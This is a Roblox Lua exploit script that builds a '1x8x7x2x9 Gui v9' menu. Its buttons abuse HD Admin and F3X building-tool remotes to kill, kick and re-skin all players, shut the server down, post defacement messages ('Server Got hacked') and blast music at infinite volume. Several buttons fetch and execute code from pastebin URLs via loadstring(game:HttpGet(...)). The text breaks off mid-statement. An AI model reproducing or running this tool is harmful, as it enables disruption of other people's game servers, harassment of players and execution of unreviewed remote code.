local player = game.Players.LocalPlayer local replicatedStorage = game:GetService("ReplicatedStorage") local screenGui = Instance.new("ScreenGui") screenGui.Name = "LOLP" screenGui.Parent = player:WaitForChild("PlayerGui") screenGui.ResetOnSpawn = false local mainFrame = Instance.new("Frame") mainFrame.Size = UDim2.new(0, 500, 0, 800) mainFrame.Position = UDim2.new(0.5, -300, 0.5, -225) mainFrame.BackgroundColor3 = Color3.new(0, 0, 0) mainFrame.BorderSizePixel = 4 mainFrame.BorderColor3 = Color3.fromRGB(0,0,0) mainFrame.Active = true mainFrame.Draggable = true mainFrame.Parent = screenGui local ImageLabel = Instance.new("ImageLabel") ImageLabel.Parent = mainFrame ImageLabel.BackgroundColor3 = Color3.fromRGB(143, 0, 255) ImageLabel.Position = UDim2.new(0, 0, 0, 0) ImageLabel.Size = UDim2.new(0, 500, 0, 800) ImageLabel.Image = "http://www.roblox.com/asset/?id=97514356012057" local titleLabel = Instance.new("TextLabel") titleLabel.Size = UDim2.new(1, 0, 0, 40) titleLabel.Position = UDim2.new(0, 0, 0, 0) titleLabel.BackgroundColor3 = Color3.fromRGB(0,0,0) titleLabel.BorderSizePixel = 1 titleLabel.BorderColor3 = Color3.fromRGB(143,0,255) titleLabel.Font = Enum.Font.JosefinSans titleLabel.Text = "1x8x7x2x9 Gui v9" titleLabel.TextColor3 = Color3.fromRGB(255,255,255) titleLabel.TextSize = 30 titleLabel.Parent = mainFrame local titleLabel = Instance.new("TextLabel") titleLabel.Size = UDim2.new(1, 0, 0, 40) titleLabel.Position = UDim2.new(0, 0, 0.04, 1) titleLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0) titleLabel.BorderSizePixel = 1 titleLabel.BorderColor3 = Color3.fromRGB(143, 0, 255) titleLabel.Font = Enum.Font.JosefinSans titleLabel.Text = "Ep1k music" titleLabel.TextColor3 = Color3.fromRGB(255, 255, 255) titleLabel.TextSize = 30 titleLabel.Parent = mainFrame local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.1, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "1x1x1x1x1 music" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 139488665764275") RequestCommand:InvokeServer(";pitch 0.85") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.16, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "unmusic" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";unmusic") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.35, 0, 0.1, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Patrick Laugh" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 7816195044") RequestCommand:InvokeServer(";pitch 0.3") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.1, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Troll cut remix" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 102275179347855") RequestCommand:InvokeServer(";pitch 0.3") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.16, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "RUMBLE!" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 7795812961") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.35, 0, 0.16, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Opening Theme" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 132046898251409") RequestCommand:InvokeServer(";pitch 0.3") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.22, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Wonga" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 100792696468630") RequestCommand:InvokeServer(";pitch 0.15") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.69, 0, 0.16, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Spooky Remix" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 75436219824043") RequestCommand:InvokeServer(";pitch 0.2") RequestCommand:InvokeServer(";volume inf") end) local titleLabel = Instance.new("TextLabel") titleLabel.Size = UDim2.new(1, 0, 0, 40) titleLabel.Position = UDim2.new(0, 0, 0.27, 1) titleLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0) titleLabel.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) titleLabel.Font = Enum.Font.JosefinSans titleLabel.Text = "" titleLabel.TextColor3 = Color3.fromRGB(255, 255, 255) titleLabel.BorderColor3 = Color3.fromRGB() titleLabel.TextSize = 30 titleLabel.Parent = mainFrame local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.33, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "get f3x" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";btools") RequestCommand:InvokeServer(";buildingtools") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.33, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Decal" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/z7XyxYfQ',true))() end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.39, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Skeleton Skybox" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/SEQET6qh',true))() end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.33, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "skybox" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local player = game.Players.LocalPlayer local char = player.Character local tool for i,v in player:GetDescendants() do if v.Name == "SyncAPI" then tool = v.Parent end end for i,v in game.ReplicatedStorage:GetDescendants() do if v.Name == "SyncAPI" then tool = v.Parent end end --craaa remote = tool.SyncAPI.ServerEndpoint function _(args) remote:InvokeServer(unpack(args)) end function SetCollision(part,boolean) local args = { [1] = "SyncCollision", [2] = { [1] = { ["Part"] = part, ["CanCollide"] = boolean } } } _(args) end function SetAnchor(boolean,part) local args = { [1] = "SyncAnchor", [2] = { [1] = { ["Part"] = part, ["Anchored"] = boolean } } } _(args) end function CreatePart(cf,parent) local args = { [1] = "CreatePart", [2] = "Normal", [3] = cf, [4] = parent } _(args) end function DestroyPart(part) local args = { [1] = "Remove", [2] = { [1] = part } } _(args) end function MovePart(part,cf) local args = { [1] = "SyncMove", [2] = { [1] = { ["Part"] = part, ["CFrame"] = cf } } } _(args) end function Resize(part,size,cf) local args = { [1] = "SyncResize", [2] = { [1] = { ["Part"] = part, ["CFrame"] = cf, ["Size"] = size } } } _(args) end function AddMesh(part) local args = { [1] = "CreateMeshes", [2] = { [1] = { ["Part"] = part } } } _(args) end function SetMesh(part,meshid) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["MeshId"] = "rbxassetid://"..meshid } } } _(args) end function SetTexture(part, texid) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["TextureId"] = "rbxassetid://"..texid } } } _(args) end function SetName(part, stringg) local args = { [1] = "SetName", [2] = { [1] = part }, [3] = stringg } _(args) end function MeshResize(part,size) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["Scale"] = size } } } _(args) end function Weld(part1, part2,lead) local args = { [1] = "CreateWelds", [2] = { [1] = part1, [2] = part2 }, [3] = lead } _(args) end function SetLocked(part,boolean) local args = { [1] = "SetLocked", [2] = { [1] = part }, [3] = boolean } _(args) end function SetTrans(part,int) local args = { [1] = "SyncMaterial", [2] = { [1] = { ["Part"] = part, ["Transparency"] = int } } } _(args) end function CreateSpotlight(part) local args = { [1] = "CreateLights", [2] = { [1] = { ["Part"] = part, ["LightType"] = "SpotLight" } } } _(args) end function SyncLighting(part,brightness) local args = { [1] = "SyncLighting", [2] = { [1] = { ["Part"] = part, ["LightType"] = "SpotLight", ["Brightness"] = brightness } } } _(args) end function Color(part,color) local args = { [1] = "SyncColor", [2] = { [1] = { ["Part"] = part, ["Color"] = color --[[Color3]], ["UnionColoring"] = false } } } _(args) end function SpawnDecal(part,side) local args = { [1] = "CreateTextures", [2] = { [1] = { ["Part"] = part, ["Face"] = side, ["TextureType"] = "Decal" } } } _(args) end function AddDecal(part,asset,side) local args = { [1] = "SyncTexture", [2] = { [1] = { ["Part"] = part, ["Face"] = side, ["TextureType"] = "Decal", ["Texture"] = "rbxassetid://".. asset } } } _(args) end function Sky(id) e = char.HumanoidRootPart.CFrame.x f = char.HumanoidRootPart.CFrame.y g = char.HumanoidRootPart.CFrame.z CreatePart(CFrame.new(math.floor(e),math.floor(f),math.floor(g)) + Vector3.new(0,6,0),workspace) for i,v in game.Workspace:GetDescendants() do if v:IsA("BasePart") and v.CFrame.x == math.floor(e) and v.CFrame.z == math.floor(g) then --spawn(function() SetName(v,"Sky") AddMesh(v) --end) --spawn(function() SetMesh(v,"111891702759441") SetTexture(v,id) --end) MeshResize(v,Vector3.new(6000,6000,6000)) SetLocked(v,true) end end end Sky("113615330834548") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.69, 0, 0.1, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "BING BING BANG"scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 89293274845575") RequestCommand:InvokeServer(";pitch 0.25") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.39, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "lazytown sky" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/0A0xyFPX',true))() end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.39, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "R6" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";R6 ") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.45, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Fire all" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";Fire all") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.45, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "disco" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";disco") RequestCommand:InvokeServer(";time 1") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.45, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Toadroasted remake!" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/3Kj0xzjy',true))() end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.51, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "kick all" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";Kick all Server Got hacked by 1x8x7x2x9") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.51, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Message" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";ServerMessage 1x8x7x2x9 is here to destroy") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.51, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Skybox 2" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/DYmKLtTD',true))() end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.65, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "kill all" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";kill all") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.71, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "char all 1x8x7x2x9" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";char all 1x8x7x2x9") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.58, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Macedonia sky" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/A5giEkTs',true))() end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.58, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "ShutDown" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";ShutDown") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.010, 0, 0.58, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Chat all" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";Chat all Team 1x8x7x2x9 Join Today") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 